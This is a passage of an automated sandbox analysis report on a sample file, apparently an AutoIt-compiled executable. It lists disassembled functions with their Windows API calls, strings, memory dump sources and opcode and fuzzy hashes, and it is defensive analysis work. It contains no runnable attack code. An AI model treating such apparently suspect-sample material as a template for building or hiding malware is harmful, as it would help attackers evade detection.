                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 946324512-2422070025
                                      • Opcode ID: b9ad1417c30b82549750ca9918c62ae6c8284324efc1e9f35570b497fcc7faa1
                                      • Instruction ID: 341eeb10eb42ad59b1d1c2935616e05a910f6899a85399c53fa2c8d01054d73d
                                      • Opcode Fuzzy Hash: b9ad1417c30b82549750ca9918c62ae6c8284324efc1e9f35570b497fcc7faa1
                                      • Instruction Fuzzy Hash: 4731B0392042059FCB20CF29C485EAA77F8EF55318F24C499E8158B7D2DB72EE45C761
                                      Function 00914653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00914705
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00914713
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0091471A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 4014797782-2298589950
                                      • Opcode ID: d26e6e718e4e84d429826a7da7729b7b637044370cb23924c22ed6b4215b22a2
                                      • Instruction ID: 06967de18fadb1b7150218a99c32b03b32ea3c023c94bc5594a90f5cedc403da
                                      • Opcode Fuzzy Hash: d26e6e718e4e84d429826a7da7729b7b637044370cb23924c22ed6b4215b22a2
                                      • Instruction Fuzzy Hash: 4A216DB5604209AFEB11DF68DCD1DA737ADEB9A7A8B040059FA00DB291CB70EC51DB61
                                      Function 008E95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 176396367-2734436370
                                      • Opcode ID: 424ff3eb47216a4c87a71b0b0d2230ca33734ef874e03be512d86828111f187a
                                      • Instruction ID: 54b323c02ce2dd1cd3e989ae72c07c12ac2135ca19be156bb4b49930e9c6de24
                                      • Opcode Fuzzy Hash: 424ff3eb47216a4c87a71b0b0d2230ca33734ef874e03be512d86828111f187a
                                      • Instruction Fuzzy Hash: 7B216872204694A6D731BB2A9C02FBB73A8FFA3304F144426F989D7051EBD49D91C3A2
                                      Function 009137B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00913840
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00913850
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00913876
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 079cd0494f7074f991952ef6df0151e1f7d4511d5bd835ac700a053d2c1b0a96
                                      • Instruction ID: 54041c3eef6e7573a72bceec3216abbb8918ca9f38e0eb889a1ce9b059fda8c2
                                      • Opcode Fuzzy Hash: 079cd0494f7074f991952ef6df0151e1f7d4511d5bd835ac700a053d2c1b0a96
                                      • Instruction Fuzzy Hash: E021AC72710218BBEF218F64CC81FEB377EEF89754F108124F9009B190C6719C9287A0
                                      Function 008F49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008F4A08
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008F4A5C
                                      • SetErrorMode.KERNEL32(00000000,?,?,0091CC08), ref: 008F4AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: %lu
                                      • API String ID: 2507767853-685833217
                                      • Opcode ID: f404e7866a01586111a108100961975d3f86f74fed7608b48eefe3b4aae7a40e
                                      • Instruction ID: 4ce46871df4c0deb3afe86ea6dd6b2e68cc146c99f006b88ae486232a14cfdd3
                                      • Opcode Fuzzy Hash: f404e7866a01586111a108100961975d3f86f74fed7608b48eefe3b4aae7a40e
                                      • Instruction Fuzzy Hash: A7317175A40109AFDB10DF68C885EAA7BF8FF09308F1480A9F909DB252D771ED45CB62
                                      Function 009141EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0091424F
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00914264
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00914271
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: 42ea53af47dfa4758ca2f335f185dc7f697e863bf6edcd8d76cb9509986d4aef
                                      • Instruction ID: 3497c9b96093cf58a7e0e76c3de07d008dd0ba0e170a340492d9c9213d0ed3f5
                                      • Opcode Fuzzy Hash: 42ea53af47dfa4758ca2f335f185dc7f697e863bf6edcd8d76cb9509986d4aef
                                      • Instruction Fuzzy Hash: AA11E031340208BEEF205E69CC06FEB3BACEF99B64F110524FA55E20A0D271DCA19B20
                                      Function 008E2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                        • Part of subcall function 008E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008E2DC5
                                        • Part of subcall function 008E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 008E2DD6
                                        • Part of subcall function 008E2DA7: GetCurrentThreadId.KERNEL32 ref: 008E2DDD
                                        • Part of subcall function 008E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008E2DE4
                                      • GetFocus.USER32 ref: 008E2F78
                                        • Part of subcall function 008E2DEE: GetParent.USER32(00000000), ref: 008E2DF9
                                      • GetClassNameW.USER32(?,?,00000100), ref: 008E2FC3
                                      • EnumChildWindows.USER32(?,008E303B), ref: 008E2FEB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                      • String ID: %s%d
                                      • API String ID: 1272988791-1110647743
                                      • Opcode ID: ecfcd3bd9d287b4fdff2d6a8b422bfa4a5ab0d27f900efd0af010370e3480990
                                      • Instruction ID: 42512cadde227bf299fcdd307a596deed0a8ea8aa0735b79745aebef581cac3f
                                      • Opcode Fuzzy Hash: ecfcd3bd9d287b4fdff2d6a8b422bfa4a5ab0d27f900efd0af010370e3480990
                                      • Instruction Fuzzy Hash: 8111D2B17002496BCF047F698C89EEE376AFF85318F048075BA09EB252EE309D45CB61
                                      Function 00915882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009158C1
                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009158EE
                                      • DrawMenuBar.USER32(?), ref: 009158FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$InfoItem$Draw
                                      • String ID: 0
                                      • API String ID: 3227129158-4108050209
                                      • Opcode ID: ed0a84493c45647fc9b81492c87c82b500f6946b9fb344ee36c988cf7e1341e0
                                      • Instruction ID: 752353551753424816ec0870401e0967acd0f588ebe7d188091e53d1094f26da
                                      • Opcode Fuzzy Hash: ed0a84493c45647fc9b81492c87c82b500f6946b9fb344ee36c988cf7e1341e0
                                      • Instruction Fuzzy Hash: BD018B31604218EFDB219F11DC44BEEBBB9FB85360F158099F849DA161DB308A80EF22
                                      Function 008DD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 008DD3BF
                                      • FreeLibrary.KERNEL32 ref: 008DD3E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProc
                                      • String ID: GetSystemWow64DirectoryW$X64
                                      • API String ID: 3013587201-2590602151
                                      • Opcode ID: f134a448645b6c5ad0b9077e295dc32c0e3ee611629af4618825ff8d29164343
                                      • Instruction ID: 6cb9b6e70bf09246b2052eb944dbb8cf5ac5cac172346774cef45d13dd25bf85
                                      • Opcode Fuzzy Hash: f134a448645b6c5ad0b9077e295dc32c0e3ee611629af4618825ff8d29164343
                                      • Instruction Fuzzy Hash: 29F055B1AC9B29ABD73962108C14EAE7320FF00705B58831BE802E6345E720CC858282
                                      Function 008E007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f7e489ef25ec77998d6baa9b1f44921eca80a5f7ccc83227dfb1c153d7121c26
                                      • Instruction ID: 909d21c6ed604434a3eb4070ad4b6a178cb793947cd063a535c99166f679d736
                                      • Opcode Fuzzy Hash: f7e489ef25ec77998d6baa9b1f44921eca80a5f7ccc83227dfb1c153d7121c26
                                      • Instruction Fuzzy Hash: 76C16B75A0024AEFCB15CFA9C894AAEB7B5FF49304F208998E505EB251D771ED81CF90
                                      Function 0090342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInitInitializeUninitialize
                                      • String ID:
                                      • API String ID: 1998397398-0
                                      • Opcode ID: 01822a6908543a678f08f191aee6569d0922b63c8015dedbde9d309cfdb7d5f5
                                      • Instruction ID: d0de28f001d3a1b1f1315eca64ff258782ff5a52f7bb37de2d858888b045c02a
                                      • Opcode Fuzzy Hash: 01822a6908543a678f08f191aee6569d0922b63c8015dedbde9d309cfdb7d5f5
                                      • Instruction Fuzzy Hash: 78A12D756047009FCB10EF28C585A2AB7E9FF89714F148859F99ADB3A2DB31ED01CB52
                                      Function 008E0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                      Download Yara Rule
                                      APIs
                                      • ProgIDFromCLSID.COMBASE(?,00000000), ref: 008E05F0
                                      • CoTaskMemFree.COMBASE(00000000), ref: 008E0608
                                      • CLSIDFromProgID.COMBASE(?,?), ref: 008E062D
                                      • _memcmp.LIBVCRUNTIME ref: 008E064E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID:
                                      • API String ID: 314563124-0
                                      • Opcode ID: ef87a0699638f856cd2c2c7e8c540fdd4372cba31a8040108e943d0874766ae6
                                      • Instruction ID: b142c0a43cd926422dd677fb69ef2233395d8147e232d3fcf6e108e39e7939e2
                                      • Opcode Fuzzy Hash: ef87a0699638f856cd2c2c7e8c540fdd4372cba31a8040108e943d0874766ae6
                                      • Instruction Fuzzy Hash: 1A81E775A00209AFCB04DF94C984EEEB7B9FF89315B204598E516EB250DB71AE46CF60
                                      Function 008C1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 4cf7ed98a3de7da4e458eab374baa6e19688c006998730cc7ab894dca4143261
                                      • Instruction ID: a75d3a3b05225c6caf35589e2dd88bdf76c63300d9d978ef4cd1b3eedd10211b
                                      • Opcode Fuzzy Hash: 4cf7ed98a3de7da4e458eab374baa6e19688c006998730cc7ab894dca4143261
                                      • Instruction Fuzzy Hash: 5F410931600504ABEF296AFC8CC9FAE3AB6FF43370F244629F519D6693E674C8415267
                                      Function 00916278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(01053298,?), ref: 009162E2
                                      • ScreenToClient.USER32(?,?), ref: 00916315
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00916382
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: b0838ff4b834b1286241aca43a4b62a574b381b199e9250811bb8bfb0246aa78
                                      • Instruction ID: efddbb7d4c9e7d20ff880c6e55182d06ad593c37b5b626167a016f56628c490e
                                      • Opcode Fuzzy Hash: b0838ff4b834b1286241aca43a4b62a574b381b199e9250811bb8bfb0246aa78
                                      • Instruction Fuzzy Hash: 98510974A00209AFDF14DF68D980AEE7BB9FB45360F108569F865DB2A0D770ED82DB50
                                      Function 008BB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 91f5e66055777da0880f3cc2bf31b8a5e003f30aee1c85b29598b1f36828a6be
                                      • Instruction ID: 844303fc3ab9b277b1e228a7644f597eebf71fa4b64a0fd2c13157b1387eb6ec
                                      • Opcode Fuzzy Hash: 91f5e66055777da0880f3cc2bf31b8a5e003f30aee1c85b29598b1f36828a6be
                                      • Instruction Fuzzy Hash: 62410475A00704AFD724AF7CCC45BAABBA9FB89710F10852EF152DB782D7B1D9018785
                                      Function 008F56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008F5783
                                      • GetLastError.KERNEL32(?,00000000), ref: 008F57A9
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008F57CE
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008F57FA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: 601fc781279dcf46bbb8882b171e05518f55fa8c3ec96d9592069d85b1011af9
                                      • Instruction ID: 956da3ce9f3a54af8544136d064e844c9dda234e96a02d04d585ba7fe4b5b561
